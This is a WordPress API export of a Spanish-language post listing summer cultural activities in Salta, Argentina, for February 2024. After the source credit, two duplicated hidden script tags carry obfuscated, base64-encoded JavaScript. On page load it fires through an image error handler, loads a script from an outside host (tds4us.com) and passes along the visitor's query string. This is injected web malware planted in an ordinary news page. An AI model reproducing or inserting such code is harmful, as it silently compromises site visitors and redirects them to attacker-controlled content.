{"id":3735,"date":"2024-02-21T12:17:25","date_gmt":"2024-02-21T15:17:25","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3735"},"modified":"2025-08-14T00:00:09","modified_gmt":"2025-08-14T03:00:09","slug":"conoce-las-actividades-de-verano-para-saltenos-y-turistas","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3735","title":{"rendered":"Conoc\u00e9 las actividades de verano para salte\u00f1os y turistas"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-a226b01cf4e7c159b8d6fd4fd33b5e6e\" style=\"background-color:#046096\"><em>Talleres, clases, actividades l\u00fadicas, espect\u00e1culos de m\u00fasica y danza, son algunas de las propuestas que se pondr\u00e1n a disposici\u00f3n de salte\u00f1os y turistas sin l\u00edmite de edad en los diferentes espacios de la Secretar\u00eda de Cultura y Municipios de Salta<\/em><\/h4>\n\n\n\n<p>El ciclo Cultura en Vacaciones 2024 propone un calendario de actividades para todo p\u00fablico que se realizar\u00e1n hasta el 24 de febrero en los diferentes espacios de la Secretar\u00eda de Cultura y m\u00e1s de 28 municipios de la Provincia. Tambi\u00e9n, durante ese periodo, los museos provinciales tendr\u00e1n entrada libre y gratuita para salte\u00f1os y residentes en Salta.<\/p>\n\n\n\n<p>Recordamos que hasta el 25 de febrero el Museo de Arqueolog\u00eda de Alta Monta\u00f1a, Museo G\u00fcemes, Museo de la Vid y el Vino de Cafayate, Museo Arqueol\u00f3gico de Cachi y Explora Salta reciben a salte\u00f1os, salte\u00f1as y residentes en Salta con entrada gratuita.<\/p>\n\n\n\n<p><strong>Mi\u00e9rcoles 21<\/strong><\/p>\n\n\n\n<p>10hs &#8211; Museo G\u00fcemes, Espa\u00f1a 730. INGL\u00c9S para adolescentes. Clases relacionadas con el ballet. Actividad recomendada a partir de los 12 a\u00f1os hasta los 18 a\u00f1os. Actividad a cargo de la EOB.<\/p>\n\n\n\n<p>14hs \u2013 Centro Cultural Am\u00e9rica, Mitre 23. CONTEMPOR\u00c1NEO, actividad recomendada a partir de los 12 a\u00f1os en adelante. Asistir con ropa c\u00f3moda. Actividad a cargo de la EOB.<\/p>\n\n\n\n<p>14.30hs &#8211; Centro Cultural Am\u00e9rica, Mitre 23. T\u00c9CNICA DE LA DANZA, actividad recomendada a partir de los 12 a\u00f1os hasta los 16 a\u00f1os. Asistir con ropa c\u00f3moda y medias en los pies o bien con ropa de ballet. Actividad a cargo de la EOB.<\/p>\n\n\n\n<p>17hs &#8211; Museo G\u00fcemes, Espa\u00f1a 730. YOGA PARA NI\u00d1OS<\/p>\n\n\n\n<p>Asistir con ropa c\u00f3moda y medias en los pies. Actividad recomendada a partir de los 8 a\u00f1os hasta los 12 a\u00f1os. Actividad a cargo de la EOB.<\/p>\n\n\n\n<p>18 hs &#8211; Se realizar\u00e1 el taller integral de Circo para ni\u00f1os a cargo de Ana L\u00eda Garc\u00eda Villalba y Pablo Rodr\u00edguez en el Centro Cultural de Guachipas. La actividad estar\u00e1 acompa\u00f1ada por proyecciones a cargo del Cinem\u00f3vil de la Provincia.<\/p>\n\n\n\n<p><strong>Jueves 22<\/strong><\/p>\n\n\n\n<p>14hs \u2013 &nbsp;Centro Cultural Am\u00e9rica, Mitre 23. DANZAS ESPA\u00d1OLAS, actividad recomendada a partir de los 12 a\u00f1os en adelante. Asistir con ropa c\u00f3moda. Actividad a cargo de la EOB.<\/p>\n\n\n\n<p>14.30hs &#8211; Centro Cultural Am\u00e9rica, Mitre 23. T\u00c9CNICA DE LA DANZA, actividad recomendada a partir de los 12 a\u00f1os hasta los 16 a\u00f1os. Asistir con ropa c\u00f3moda y medias en los pies o bien con ropa de ballet. Actividad a cargo de la EOB.<\/p>\n\n\n\n<p>17hs &#8211; Museo G\u00fcemes, Espa\u00f1a 730. YOGA PARA NI\u00d1OS<\/p>\n\n\n\n<p>Asistir con ropa c\u00f3moda y medias en los pies. Actividad recomendada a partir de los 8 a\u00f1os hasta los 12 a\u00f1os. Actividad a cargo de la EOB.<\/p>\n\n\n\n<p>17 hs &#8211; Museo de Arte Contempor\u00e1neo, Zuvir\u00eda 90<\/p>\n\n\n\n<p><strong>Presentaci\u00f3n de los cuerpos art\u00edsticos de danza de la provincia.<\/strong><\/p>\n\n\n\n<p>El Ballet Folkl\u00f3rico de la Provincia \u201cMart\u00edn Miguel de G\u00fcemes\u201d brindar\u00e1 la capacitaci\u00f3n Master Class Contempor\u00e1neo. Las clases magistrales estar\u00e1n orientadas espec\u00edficamente a la danza folk para nivel intermedio \u2013 avanzado y destinadas a bailarines de 12 a\u00f1os en adelante que deseen profundizar sus conocimientos en la materia. Tras la capacitaci\u00f3n, se realizar\u00e1 una muestra exhibici\u00f3n por parte de los bailarines del Ballet Folkl\u00f3rico que protagonizar\u00e1n las clases magistrales.<\/p>\n\n\n\n<p>19 hs &#8211; Museo de Arte Contempor\u00e1neo, Zuvir\u00eda 90. El Ballet de la Provincia presentar\u00e1 \u201cSaudade\u201d, una intervenci\u00f3n coreogr\u00e1fica con m\u00fasicos en vivo: Piano, Mar\u00eda Milagros Boso Galli y viol\u00edn: Mar\u00eda Constanza Boso Galli quienes interpretar\u00e1n m\u00fasica de Arvo P\u00e4rt; y coreograf\u00eda a cargo de Sabrina Wehner, subdirectora del cuerpo art\u00edstico, a partir de las 19hs.&nbsp;<\/p>\n\n\n\n<p><strong>Viernes 23<\/strong><\/p>\n\n\n\n<p>10hs &#8211; Biblioteca Provincial Dr. Victorino de la Plaza, Avda. Belgrano 1002. HISTORIA DEL BALLET, actividad recomendada a partir de los 12 a\u00f1os en adelante. Actividad a cargo de la EOB.<\/p>\n\n\n\n<p>14hs \u2013 Centro Cultural Am\u00e9rica, Mitre 23. JAZZ, actividad recomendada a partir de los 12 a\u00f1os en adelante. Asistir con ropa c\u00f3moda. Actividad a cargo de la EOB.<\/p>\n\n\n\n<p>14.30hs &#8211; Centro Cultural Am\u00e9rica, Mitre 23. T\u00c9CNICA DE LA DANZA, actividad recomendada a partir de los 12 a\u00f1os hasta los 16 a\u00f1os. Asistir con ropa c\u00f3moda y medias en los pies o bien con ropa de ballet. Actividad a cargo de la EOB.<\/p>\n\n\n\n<p>17hs &#8211; Museo G\u00fcemes, Espa\u00f1a 730. Taller did\u00e1ctico de danzas folkl\u00f3ricas \u201cCoquena\u201d. Actividad con entrada libre y gratuita hasta agotar aforo. Esta actividad est\u00e1 destinada para ni\u00f1os a partir de 3 a\u00f1os en adelante.<\/p>\n\n\n\n<p><strong>S\u00e1bado 24<\/strong><\/p>\n\n\n\n<p>10hs. Actividad en la Plaza de la Usina Cultural, Espa\u00f1a 1-98, \u201cYoga con Santosha\u201d. En la zona de la Pantalla, la comunidad Santosha te esperar\u00e1 para realizar el cierre del ciclo de actividades con Ba\u00f1o de Gong. No se suspende por lluvia. No hace falta experiencia ni inscripci\u00f3n previa. Asistir con ropa c\u00f3moda, mat, colchoneta o manta y botellita con agua.<\/p>\n\n\n\n<p>10 hs y 18 hs \u2013 CCI, Urquiza 112 en el Barrio San Vicente, General G\u00fcemes. Taller de dibujo para ni\u00f1as, ni\u00f1os y j\u00f3venes a partir de los 6 a\u00f1os. La jornada a cargo de Rufus inicia con una meditaci\u00f3n para estimular la creatividad, tras lo cual, se jugar\u00e1 con la creaci\u00f3n de personajes originales para llevar lo creado a un p\u00f3ster ilustrativo.<\/p>\n\n\n\n<p>10.30 hs \u2013 Centro Cultural 13 de Febrero, Gorriti 244 en General G\u00fcemes. Se realizar\u00e1 el taller de creaci\u00f3n de cuentos de teatro de papel \u201cEmpapelando mundos\u201d a cargo de Cecilia Barboza, Mar\u00eda Guadalupe Blasco y Fabiana del Milagro Tapia.<\/p>\n\n\n\n<p>17 hs &#8211; Museo de Bellas Artes de Salta, Avda. Belgrano 992<\/p>\n\n\n\n<p><strong>Presentaci\u00f3n de los cuerpos art\u00edsticos de danza de la provincia.<\/strong><\/p>\n\n\n\n<p>El Ballet Folkl\u00f3rico de la Provincia \u201cMart\u00edn Miguel de G\u00fcemes\u201d brindar\u00e1 la capacitaci\u00f3n Master Class Contempor\u00e1neo. Las clases magistrales estar\u00e1n orientadas espec\u00edficamente a la danza folk para nivel intermedio \u2013 avanzado y destinadas a bailarines de 12 a\u00f1os en adelante que deseen profundizar sus conocimientos en la materia. Tras la capacitaci\u00f3n, se realizar\u00e1 una muestra exhibici\u00f3n por parte de los bailarines del Ballet Folkl\u00f3rico que protagonizar\u00e1n las clases magistrales.<\/p>\n\n\n\n<p>18:30 hs \u2013 Taller de Artesan\u00edas a cargo de Victoria Ofelia G\u00f3mez en la Casa de la Cultura de Embarcaci\u00f3n, departamento San Mart\u00edn, ubicado en calle 9 de Julio N\u00ba 464. Actividad con entrada libre y gratuita.<\/p>\n\n\n\n<p>19 hs &#8211; Museo de Bellas Artes de Salta, Avda. Belgrano 992.<\/p>\n\n\n\n<p>El Ballet de la Provincia presentar\u00e1 \u201cSaudade\u201d, una intervenci\u00f3n coreogr\u00e1fica con m\u00fasicos en vivo: Piano, Mar\u00eda Milagros Boso Galli y viol\u00edn: Mar\u00eda Constanza Boso Galli quienes interpretar\u00e1n m\u00fasica de Arvo P\u00e4rt; y coreograf\u00eda a cargo de Sabrina Wehner, subdirectora del cuerpo art\u00edstico, a partir de las 19hs.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/conoce-las-actividades-de-verano-para-saltenios-y-turistas-94249\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n.<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Talleres, clases, actividades l\u00fadicas, espect\u00e1culos de m\u00fasica y danza, son algunas de las propuestas que se pondr\u00e1n a disposici\u00f3n de salte\u00f1os y turistas sin l\u00edmite de edad en los diferentes espacios de la Secretar\u00eda de Cultura y Municipios de Salta El ciclo Cultura en Vacaciones 2024 propone un calendario de actividades para todo p\u00fablico que [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3736,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11],"tags":[],"class_list":{"0":"post-3735","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3735"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3735"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3735\/revisions"}],"predecessor-version":[{"id":6846,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3735\/revisions\/6846"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3736"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3735"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3735"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3735"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}